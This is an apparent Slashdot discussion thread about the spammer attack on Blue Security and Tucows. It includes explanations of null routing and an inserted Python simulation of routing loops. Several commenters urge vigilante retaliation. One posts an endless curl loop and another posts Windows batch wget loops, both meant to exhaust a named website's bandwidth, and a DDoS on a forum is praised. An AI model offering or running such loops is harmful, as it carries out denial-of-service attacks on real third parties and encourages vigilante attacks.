What Happened to Blue Security
shadowknot writes "Blue Security has published a detailed account of the attack on their servers perpetrated by spammer "PharmaMaster". The attack included a DDoS attack on the Blue Security operational system and a Black Hole filtering attack on the Blue Security website. From the article: "The first attack was to block worldwide access to Blue Security's corporate website (www.bluesecurity.com) by tampering with the Internet backbone using a technique called "Blackhole Filtering". The Second attack was a DDoS attack on Blue Security's operational system."
They deserve a break.
Slashdot Burying Stories About Slashdot Media Owned
[May 3rd 16:43 GMT]
PharmaMaster Strikes Again, Takes Down Tucows
PharmaMaster starts another attack and takes down Tucows's DNS servers which were serving thousands of sites, including Blue Security's. Tucows terminates Blue Security's account in an attempt to stop the attack.
And it wasn't all that long ago that DNS vulnerabilities were under discussion. Attacking a DNS server not only takes out the site intended, it has the bonus of collateral damage. Imagine the chagrin of all the other sites served by Tucows when they all go down en masse and imagine the PR campaign that Blue Security is going to have to wage to get any credibility back.
GetOuttaMySpace - The Anti-Social Network
Someone used their tool to clean a list, then compared the clean list to a "pre-scrub" list, which means they didn't gain any email addresses, they just learned something about the emails they already had been sending spam to.
Don't quit Blue Security. My philosophy boils down to "millions for defense, not a penny for tribute" (Jefferson).
The forum that organized (or at least helped in) the attack is located here, but I think it's still down. It was nailed by a deliberate vigilante DDoS from about a hundred or so Digg members yesterday/last night. They hacked a university to host it after the first host got nailed. Not sure what happened after that.
shameless from digg, but an easy redirect for /.ers without having to read digg's stuff:
Information Week's take on it makes it seem less, well, amazing on the part of the spammers.
http://www.informationweek.com/story/showArticle.jhtml?articleID=187200875
My thoughts exactly.
A Google search showed this slide: http://www.soi.wide.ad.jp/class/20040013/slides/11/23.html
Based on that slide, I think that Israeli BGP routers were hacked, adding a null route for the BlueSecurity IPs.
I could be wrong (in fact, I'd bet I am).
This is what annoys me. What are they thinking? They're helping spammers listwash. The fact that a spammer can simply use a diff of his lists before vs. after to find out who's using the service is trivial; the larger point is that even after the list has been purged of BlueSecurity users, the spammer is still spamming. It's addressing only a symptom, not the cause.
They should say to the spammers 'if you continue to spam the addresses of our subscribers, we will continue to jam your unsubscribe addresses and drop boxes with garbage messages, one per spam email received. No, we're not telling you which addresses these are. Stop sending all mail to all addresses for which you do not have a confirmed opt-in, and you will have no further trouble from us.'
That way they're not helping the spammers continue to spam, and I'd feel a lot better about them.
Real Daleks don't climb stairs - they level the building.
Those spammers will threat e-mails if you unsubscribe or not, so don't unsubscribe. They're doing this because it's hurting it in their pocket. Big deal. I don't give a damn if a spammer can't buy a new humvee limo, and I don't have to support those scumbags. So if they want to fill my mailbox with their trash, so be it. I will not bend over to them. I will not unsubscribe. I will not let those fscking bastards tell me what I should do.
PharmaMaster is an IM and forum handle. He's a major spammer, and probably responsible for at least some of that junk in my google mailbox's junk folder right now. He is apparently working with a cartel of spammers to try to crush anti-spam attempts. Interesting reading about their planning on the specialham.com spammer's forum was mirrored online somewhere yesterday, but got taken down for some reason.
An InfoWorld article from May 4th quoted Blue Security CEO Eran Reshef as saying:
Since Blue Security is now referring to "tier-1 ISP name withheld", that means one of several things:
Gamingmuseum.com: Give your 3D accelerator a rest.
If you must!
I don't think windows has a similar function readily available.
Try "nul:", as in "rmdir banana >nul:"
That thread is great ... I wonder about the Oslo university thing (that's where they've now moved their server to). If anyone here speaks Norwegian and wanted to write them a letter, contact info is on the Digg page. I'm surprised it hasn't gotten taken down already, but maybe the sysop there doesn't read English (I assume all the Digg'ers have been writing in English...).
They also read through the forums and found some of the actual spammers' websites:
http://www.northworks.biz/ This one is one of the shadiest, they're selling email harvesters.
In case anyone wants to take matters into their own hands, as one of the Digg people pointed out, there's always:
while :; do curl -o /dev/null http://www.northworks.biz/install_mc_shareware.exe ; done
His bandwidth bill is going to suck this month...
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
for windows users via a proxy:
@echo off
set http_proxy=http://yourproxyhereifapplicable
rem remove the above if you don't have a proxy server
:start
wget http://www.northworks.biz/install_mc_shareware.exe --proxy-user=username --proxy-pass=password
goto start
without a proxy:
@echo off
:start
wget http://www.northworks.biz/install_mc_shareware.exe
goto start
(save as a batch file in the same dir as wget)
download wget from www.gnu.org/software/wget/
have fun
:-)
A variation of this technique is to route packets to an internal "blackhole router" instead of to Null0. This consumes a little more resources than the Null0 option but still far less than an ACL. The blackhole router does nothing else other than null routing the traffic. It can also be used to route the traffic to a sniffing device to give the admin an opportunity to see what the malicious traffic really was. The blackhole router can also advertise internally the blackhole routes. This is useful when your network policy prohibits making changes to critical hardware such as a border router without sufficient peer review. Often when you must null route something you must do it in a hurry (i.e., a customer is being attacked). Being able to make the changes on a non-critical box (the blackhole router) and having the route changes propagate up to a critical piece of hardware (the border router(s)) is very useful.
Another reason to use them is to prevent routing loops. Let's say for example you have an access server terminating dialin customers. You've loaded out your AS with 192 modems. A /24 has been allocated for this AS. Your AS advertises that /24 with OSPF back into the core of your ISP network. However the AS's routing table doesn't contain a route for all 253 of the usable IPs in that /24. Instead individual routes are added as individual users dial in. Let's say a packet comes in that's destined for an IP that isn't in use. The AS looks at its routing table and says to itself that it doesn't have a route to that IP. It falls back on its default route which is the router upstream of the AS that just routed the packet to the AS. Rinse and repeat. A routing loop ensues.
Sometimes in BGP you have to have a static route to a given netblock to turn around and advertise it. You already have internal routes that would ultimately route the packet to the right destination. However to get BGP working you have to create a specific route. You can simply create a static route to that subnet via Null0 with a cost of 254 and make BGP happy.
There are dozens of examples of why you need null routing. Does that help? You can search on Cisco's website for additional references.
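The routing-loop argument in the comment above can be checked with a small forwarding simulation. The following is an added example written for this page, not code from the commenter or from any router vendor: it models two routers with longest-prefix-match lookup, an access server that only knows the /32s of customers currently dialed in plus a default route back upstream, and an upstream router that learned the whole /24 via OSPF. The router names, the 192.0.2.0/24 documentation prefix, the "dialed-in" /32s and the TTL budget are all constructed for the illustration. Without a covering Null0 route a packet to an unused address ping-pongs between the two boxes until its TTL runs out; with the covering route it is discarded on the first hop at the access server, while live customers are still reached because their /32 is more specific than the /24.

```python
import ipaddress

# Sentinel next hops for the simulation (constructed names, not real interfaces).
NULL0 = "Null0"       # discard: the packet is dropped with no further forwarding
DELIVER = "deliver"   # terminating hop, e.g. the modem line of a dialed-in customer


class Router:
    """Minimal FIB: a list of (network, next_hop) with longest-prefix-match lookup."""

    def __init__(self, name):
        self.name = name
        self.routes = []

    def add_route(self, prefix, next_hop):
        self.routes.append((ipaddress.ip_network(prefix), next_hop))

    def lookup(self, dst):
        dst = ipaddress.ip_address(dst)
        matches = [(net, nh) for net, nh in self.routes if dst in net]
        if not matches:
            return None
        # The most specific (longest) prefix wins, as in a real forwarding table.
        return max(matches, key=lambda m: m[0].prefixlen)[1]


def forward(start, dst, ttl=8):
    """Walk one packet through the topology; returns (outcome, list of router names visited)."""
    hop, path = start, []
    while ttl > 0:
        path.append(hop.name)
        nh = hop.lookup(dst)
        if nh is None:
            return "no_route", path
        if nh == NULL0:
            return "dropped_null0", path
        if nh == DELIVER:
            return "delivered", path
        hop = nh          # next_hop is another Router object
        ttl -= 1
    return "ttl_expired", path


def build_topology(with_null_route):
    """Upstream core router plus an access server terminating dial-in customers."""
    upstream = Router("upstream")
    access = Router("access-server")
    # Upstream learned the whole /24 from the access server (via OSPF in the comment).
    upstream.add_route("192.0.2.0/24", access)
    # The access server only has host routes for the customers currently dialed in ...
    access.add_route("192.0.2.10/32", DELIVER)
    access.add_route("192.0.2.20/32", DELIVER)
    # ... and a default route pointing back at the upstream router.
    access.add_route("0.0.0.0/0", upstream)
    if with_null_route:
        # Covering route: any address in the /24 that is not a live /32 is discarded
        # here instead of being bounced back upstream.
        access.add_route("192.0.2.0/24", NULL0)
    return upstream, access


if __name__ == "__main__":
    for flag in (False, True):
        up, _ = build_topology(with_null_route=flag)
        print(f"null route on access server: {flag}")
        for target in ("192.0.2.10", "192.0.2.77"):
            outcome, path = forward(up, target)
            print(f"  {target}: {outcome} via {' -> '.join(path)}")
```

The blackhole-router variant from the comment is the same mechanism with the discard moved one box away: replace the `NULL0` entry on the access server with a route to a third `Router` whose only entry is a default route to `NULL0` (or to a sniffer), and the loop is still broken while the critical border box needs no change.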
Well it certainly hasn't doubled but it did get roughly a 20% increase. They were just a tad over 400K when they got everything back online. Their site currently shows 471,266 as the number of registered users.
If you must!
Posted A/C (despite deserving karma for hauling this crap past the lameness filter), because I cannot verify that this is the content from the specialham.com forums; the original forum posting thread (indicated via digg) has been removed and disavowed by the forum maintainer. However, Googling for a couple phrases that were quoted on Digg turned this up:
Only for some type of spam, message placement will still go out. Stuff like political ads and proselytizing where no response is needed will still go out. But anyone trying to sell some questionable product from a website or email drop is not going to want to get hammered with the return of a big percentage of the spam emails.
Phishing and other forms of identity theft are also going to be a lot harder. If you go to the Bluesecurity site, you'll see they have multiple classes of spam and responses to each class. Some stuff gets bounced to the FDA, some to the BSA, even some to MPAA. Childporn looks like it goes to Interpol.
I have no illusions that it will get rid of ALL spam, but it will put the hurt on some spammers and that's 100% better than just trying to filter or ignore the incoming spam.
Starman97@Gmail.com (bring it on spammers)
The client is only for convenience and is optional. You can sign up for an account and forward your spam (as body or attachment) to username@reports.bluesecurity.com.